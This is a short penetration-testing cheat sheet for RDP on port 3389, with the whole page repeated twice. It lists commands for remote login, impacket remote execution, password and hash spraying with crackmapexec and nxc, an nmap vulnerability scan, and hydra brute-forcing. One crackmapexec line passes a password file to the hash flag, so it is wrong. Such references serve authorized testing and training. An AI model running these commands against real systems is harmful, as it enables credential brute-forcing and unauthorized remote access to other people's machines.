RDP (3389)

Basic

xfreerdp /v:<IP> /u:<USER> /d:<DOMAIN> /p:<PASS> +clipboard /dynamic-resolution /drive:/opt,share

rdesktop -u <username> <IP>

rdesktop -d <domain> -u <username> -p <pass> <IP>

impacket

impacket-psexec <user>:<pass>@<IP> 
impacket-wmiexec <domain>/<user>:<pass>@<IP>

crackmapexec/nxc

crackmapexec rdp <IP> -u users.txt -H passwords.txt --continue-on-success

nxc rdp <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc rdp <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

nmap

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

bruteforce

hydra -L <users.txt> -p <pass.txt> <IP> rdp

PreviousSMTP (25)NextEvil-WinRM (5985/5986)

Last updated 3 months ago

RDP (3389)

Basic

xfreerdp /v:<IP> /u:<USER> /d:<DOMAIN> /p:<PASS> +clipboard /dynamic-resolution /drive:/opt,share

rdesktop -u <username> <IP>

rdesktop -d <domain> -u <username> -p <pass> <IP>

impacket

impacket-psexec <user>:<pass>@<IP> 
impacket-wmiexec <domain>/<user>:<pass>@<IP>

crackmapexec/nxc

crackmapexec rdp <IP> -u users.txt -H passwords.txt --continue-on-success

nxc rdp <IP> -d <domain name> -u users.txt -p passwords.txt --continue-on-success
nxc rdp <IP> -d <domain name> -u users.txt -H hashes.txt --continue-on-success

nmap

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

bruteforce

hydra -L <users.txt> -p <pass.txt> <IP> rdp

PreviousSMTP (25)NextEvil-WinRM (5985/5986)

Last updated 3 months ago